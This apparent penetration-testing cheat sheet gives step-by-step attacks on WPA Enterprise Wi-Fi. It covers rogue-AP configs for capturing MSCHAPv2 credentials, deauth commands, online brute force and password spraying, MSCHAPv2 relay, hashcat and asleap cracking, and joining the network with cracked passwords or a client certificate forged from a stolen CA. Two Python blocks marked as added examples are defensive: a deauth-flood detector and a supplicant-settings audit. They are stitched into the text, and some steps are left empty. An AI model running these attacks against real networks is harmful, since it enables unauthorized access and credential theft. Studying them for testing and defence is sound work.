Overview
WPA Enterprise authenticates users via 802.1X/RADIUS. Attacks target the authentication exchange itself: lure clients to a rogue AP, capture their MSCHAPv2 hashes or relay the challenge directly, then crack or relay to gain access.
Attack flow:
Recon → Rogue AP → Deauth → Capture credentials → Crack / Relay
Attack 1. Rogue AP (Credential Capture)
Clients that don’t validate the server certificate connect to the rogue AP and expose their MSCHAPv2 challenge/response.
Manual (hostapd-mana)
Step 1: Generate FreeRADIUS certificates:
sudo apt install freeradius freeradius-utils
cd /etc/freeradius/3.0/certs
nano ca.cnf # set country, org, CN
nano server.cnf # set server details
rm dh && make
Step 2: EAP user file (/etc/hostapd-mana/mana.eap_user):
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
Step 3: hostapd-mana config (network.conf):
ssid=<TARGET-SSID>
interface=<INTERFACE>
driver=nl80211
channel=<CHANNEL>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/etc/hostapd-mana/mana.eap_user
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1
Step 4: Launch:
sudo hostapd-mana network.conf
Credentials written to /tmp/hostapd.credoutfile.
Step 1 (eaphammer): Generate a self-signed certificate:
cd ~/tools/eaphammer
python3 ./eaphammer --cert-wizard
Step 2: Launch rogue AP:
python3 ./eaphammer -i wlan1 \
--auth wpa-eap \
--essid <TARGET-SSID> \
--creds \
--negotiate balanced
Deauth (both approaches)
Force clients off the real AP to trigger reconnection to the rogue:
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 -a <BSSID> wlan0mon -c <CLIENT-MAC>
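The deauth step above is also the noisiest part of the flow from a monitoring point of view: a burst of deauthentication frames carrying the real AP's BSSID. This added example (not code from the page) counts such frames per sending BSSID over a sliding window; it assumes a tshark field export as input, and the sample lines are constructed.

```python
"""Detect the deauthentication flood that an 'aireplay-ng -0 0' run produces.
Added example, not code from the page; the input format assumes a tshark
field export (constructed sample below)."""
from collections import defaultdict, deque

THRESHOLD = 10   # deauth frames from one BSSID ...
WINDOW = 5.0     # ... within this many seconds raises an alert

# Constructed sample of (assumed capture command):
#   tshark -i wlan0mon -Y "wlan.fc.type_subtype == 0x0c" -T fields \
#     -e frame.time_epoch -e wlan.bssid -e wlan.da -e wlan.fixed.reason_code
# 12 frames in 1.1 s to one client, carrying the real AP's BSSID, plus one
# ordinary deauth from another AP (reason 3, station leaving).
FLOOD = "\n".join(
    f"{1700000000 + i * 0.1:.2f}\t00:11:22:33:44:55\taa:bb:cc:dd:ee:01\t7"
    for i in range(12))
BENIGN = "1700000002.50\t66:77:88:99:aa:bb\taa:bb:cc:dd:ee:02\t3"
SAMPLE = FLOOD + "\n" + BENIGN

def parse_lines(text):
    """Yield (timestamp, bssid, destination, reason) per tab-separated line."""
    for line in text.splitlines():
        parts = line.strip().split("\t")
        if len(parts) != 4:
            continue  # malformed or empty line
        ts, bssid, dst, reason = parts
        yield float(ts), bssid.lower(), dst.lower(), int(reason)

def detect_floods(text, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of deauth frames per sending BSSID; one alert per
    BSSID the first time its window fills (the sender is the spoofed real AP)."""
    recent = defaultdict(deque)   # bssid -> timestamps inside the window
    targets = defaultdict(set)    # bssid -> destinations seen
    alerts = {}
    for ts, bssid, dst, reason in parse_lines(text):
        q = recent[bssid]
        q.append(ts)
        targets[bssid].add(dst)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = {"bssid": bssid, "first_seen": q[0], "count": len(q),
                             "targets": sorted(targets[bssid]), "reason": reason}
    return list(alerts.values())
```

The alert names the client being pushed off, which is the signal to look for a rogue AP on the same ESSID; because the frames carry the legitimate BSSID, the durable fix is 802.11w (protected management frames) so clients discard unauthenticated deauths.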
Attack 2. Rogue AP with Cloned Certificate
When clients validate the server certificate, the rogue AP must present the real certificate to be trusted. Requires the CA and server cert obtained during recon.
Manual (berate_ap)
Convert certs to PEM and generate DH:
openssl x509 -in ca.crt -out hostapd.ca.pem -outform PEM
openssl x509 -in server.crt -out hostapd.cert.pem -outform PEM
openssl rsa -in server.key -out hostapd.key.pem
openssl dhparam -out hostapd.dh.pem 2048
Launch rogue AP with custom cert path:
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
--eap-cert-path /path/to/certs/ \
wlan1 lo <TARGET-SSID>
Import the real certificate (eaphammer):
python3 ./eaphammer --cert-wizard import \
--server-cert /path/to/server.crt \
--ca-cert /path/to/ca.crt \
--private-key /path/to/server.key \
--private-key-passwd whatever
Launch rogue AP (same command as Attack 1):
python3 ./eaphammer -i wlan1 \
--auth wpa-eap \
--essid <TARGET-SSID> \
--creds \
--negotiate balanced
Attack 3. Online Brute Force (air-hammer)
When a valid username is known (from recon), brute-force that user's password directly against the live AP.
Brute force single user:
cd ~/tools/air-hammer
echo 'DOMAIN\username' > target.user
./air-hammer.py -i wlan1 -e <SSID> -p ~/rockyou-top100000.txt -u target.user
Password spray across multiple users:
cat ~/usernames.txt | awk '{print "DOMAIN\\" $1}' > ~/domain-users.txt
./air-hammer.py -i wlan1 -e <SSID> -P <PASSWORD> -u ~/domain-users.txt
Attack 4. MSCHAPv2 Relay (wpa_sycophant)
Relays the victim's MSCHAPv2 challenge/response to the real AP and authenticates as the victim without knowing the password.
Step 1: Set rogue AP MAC:
systemctl stop network-manager
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up
Step 2: wpa_sycophant config:
network={
ssid="<TARGET-SSID>"
scan_ssid=1
key_mgmt=WPA-EAP
identity=""
anonymous_identity=""
password=""
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
bssid_blacklist=F0:9F:C2:00:00:00
}
Shell 1: Rogue AP:
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant \
--mana-credout output.log \
wlan1 lo <TARGET-SSID>
Shell 2: Deauth target client:
airmon-ng start wlan0
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
Shell 3: Start relay:
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2
Shell 4: Get IP:
If relay fails, change phase1:
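Both Attack 1 (the client accepts the rogue AP's certificate) and this relay (the inner MSCHAPv2 exchange is not bound to the outer TLS tunnel) depend on client-side supplicant settings. This added example (not a tool from the page) parses a wpa_supplicant network block and reports those preconditions; the weak and hardened profiles, the CA path and the RADIUS server name are constructed.

```python
"""Audit a wpa_supplicant network block for the client-side settings that
Attack 1 (no server certificate validation) and Attack 4 (relayable inner
MSCHAPv2) depend on. Added example; not a tool from the page."""
import re
# Constructed weak profile: the kind of client that joins the rogue AP.
WEAK_PROFILE = """network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="DOMAIN\\jdoe"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}"""
# Constructed hardened profile (assumed CA path and RADIUS name): pins the CA,
# checks the server name, and requires PEAPv0 cryptobinding.
HARDENED_PROFILE = """network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="DOMAIN\\jdoe"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
    phase1="peaplabel=0 crypto_binding=2"
    phase2="auth=MSCHAPV2"
}"""

def parse_network(text):
    """Map key -> value for the first network={...} block, quotes stripped."""
    body = re.search(r"network=\{(.*?)\}", text, re.S)
    if not body:
        raise ValueError("no network block found")
    net = {}
    for line in body.group(1).splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            net[key.strip()] = value.strip().strip('"')
    return net

def audit(net):
    """Return findings for a WPA-EAP block; empty means no precondition holds."""
    findings = []
    if net.get("key_mgmt") != "WPA-EAP":
        return findings
    if not net.get("ca_cert"):
        findings.append("ca_cert unset: a self-signed rogue-AP certificate is accepted")
    if not any(net.get(k) for k in ("domain_match", "domain_suffix_match", "altsubject_match")):
        findings.append("no domain_match: any certificate chaining to the CA is accepted")
    phase1 = dict(p.split("=", 1) for p in net.get("phase1", "").split() if "=" in p)
    if net.get("eap") == "PEAP" and phase1.get("crypto_binding", "1") != "2":
        findings.append("crypto_binding not required: inner MSCHAPv2 can be relayed")
    return findings
```

wpa_supplicant's default is crypto_binding=1 (use if the server offers it), which is why the relay's own config can simply set it to 0; only crypto_binding=2 on the victim makes the exchange fail against an AP that cannot produce the binding.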
Cracking Captured Hashes
hashcat (mode 5500: MSCHAPv2):
# From eaphammer log
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
# Crack
hashcat -a 0 -m 5500 hashcat.5500 ~/rockyou.txt --force
hashcat (mode 5600: NTLMv2 from hostile portal):
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force
asleap (from challenge/response pair):
asleap -C <CHALLENGE> -R <RESPONSE> -W ~/rockyou.txt
Authenticating with Obtained Credentials
PEAP/MSCHAPv2 (cracked password)
wpa-corp.conf:
network={
ssid="<TARGET-SSID>"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="DOMAIN\username"
password="<CRACKED-PASSWORD>"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -Dnl80211 -i <INTERFACE> -c wpa-corp.conf
sudo dhclient <INTERFACE> -v
EAP-TLS (client certificate from obtained CA)
Generate client certificate using the real CA:
openssl genrsa -out client.key 2048
openssl req -config client.conf -new -key client.key -out client.csr
openssl x509 -days 730 -extfile client.ext \
-CA ca.crt -CAkey ca.key -CAserial ca.serial \
-in client.csr -req -out client.crt
wpa-tls.conf:
network={
ssid="<TARGET-SSID>"
scan_ssid=1
mode=0
proto=RSN
key_mgmt=WPA-EAP
auth_alg=OPEN
eap=TLS
identity="DOMAIN\username"
ca_cert="./ca.crt"
client_cert="./client.crt"
private_key="./client.key"
private_key_passwd="whatever"
}
sudo wpa_supplicant -Dnl80211 -i <INTERFACE> -c wpa-tls.conf
sudo dhclient <INTERFACE> -v